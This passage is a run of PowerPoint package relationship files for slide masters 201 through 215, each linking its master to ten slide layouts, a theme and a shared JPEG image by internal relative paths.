<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2009.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2008.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2007.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2006.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2005.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2004.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2003.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2002.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme201.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2010.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2001.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster202.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2019.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2018.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2017.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2016.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2015.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2014.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2013.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2012.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme202.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2020.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2011.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster203.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2029.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2028.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2027.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2026.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2025.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2024.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2023.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2022.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme203.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2030.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2021.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster204.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2039.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2038.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2037.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2036.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2035.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2034.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2033.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2032.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme204.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2040.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2031.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster205.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2049.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2048.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2047.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2046.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2045.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2044.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2043.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2042.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme205.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2050.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2041.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster206.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2059.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2058.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2057.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2056.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2055.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2054.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2053.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2052.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme206.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2060.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2051.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster207.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2069.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2068.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2067.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2066.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2065.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2064.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2063.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2062.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme207.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2070.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2061.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster208.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2079.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2078.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2077.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2076.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2075.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2074.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2073.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2072.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme208.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2080.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2071.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster209.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2089.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2088.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2087.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2086.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2085.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2084.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2083.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2082.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme209.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2090.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2081.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster21.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout209.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout208.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout207.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout206.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout205.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout204.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout203.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout202.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme21.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout210.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout201.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster210.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2099.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2098.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2097.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2096.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2095.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2094.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2093.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2092.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme210.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2100.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2091.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster211.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2109.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2108.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2107.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2106.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2105.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2104.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2103.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2102.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme211.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2110.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2101.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster212.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2119.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2118.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2117.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2116.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2115.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2114.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2113.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2112.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme212.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2120.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2111.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster213.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2129.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2128.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2127.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2126.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2125.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2124.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2123.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2122.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme213.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2130.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2121.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster214.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2139.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2138.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2137.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2136.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2135.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2134.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2133.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2132.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme214.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2140.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2131.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster215.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2149.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2148.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2147.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2146.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2145.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2144.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2143.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2142.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme215.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2150.xml"/><Relationship Id="rId1" 